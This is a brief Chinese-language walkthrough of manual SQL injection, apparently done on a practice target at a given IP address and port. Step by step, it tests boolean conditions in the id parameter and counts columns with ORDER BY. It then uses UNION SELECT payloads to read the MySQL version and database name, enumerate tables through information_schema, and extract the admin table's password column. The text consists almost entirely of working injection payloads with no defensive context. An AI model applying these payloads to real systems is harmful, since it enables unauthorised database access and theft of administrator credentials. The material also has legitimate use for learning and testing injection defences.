2.1、手工注入(小熊)

第一步:

当输入地址:http://120.203.13.111:6815/?id=1%20and%201=1 表示正常看到数据

当输入地址:http://120.203.13.111:6815/?id=1%20and%201=2  表示看不到数据

说明这个地址可以sql注入

第二步:

使用order by 猜注入点 ，先是order by 10 先从10到1开始试,如果没有数据说明不正常,一直到2时才看到有数据,说明2才是注入点

查出有多少个字段(http://120.203.13.111:6815/?id=1%20and%201=2 union select 1,2)

第三步:

查一下数据库版本，and 1=2 UNION SELECT 1,version()

确定数据库版本为mysql 5.5.53

 and 1=2 UNION SELECT 1,database()爆出数据库名

因为这是个mysql数据库，且版本为5.5.53，所以接下来查询表名：(information_schema系统表名里去查表)

and 1=2 UNION SELECT 1,table_name from information_schema.tables where table_schema=database()

第四步:

 知道表后就可以查询用户后台密码

查询密码 and 1=2 UNION SELECT 1,password from admin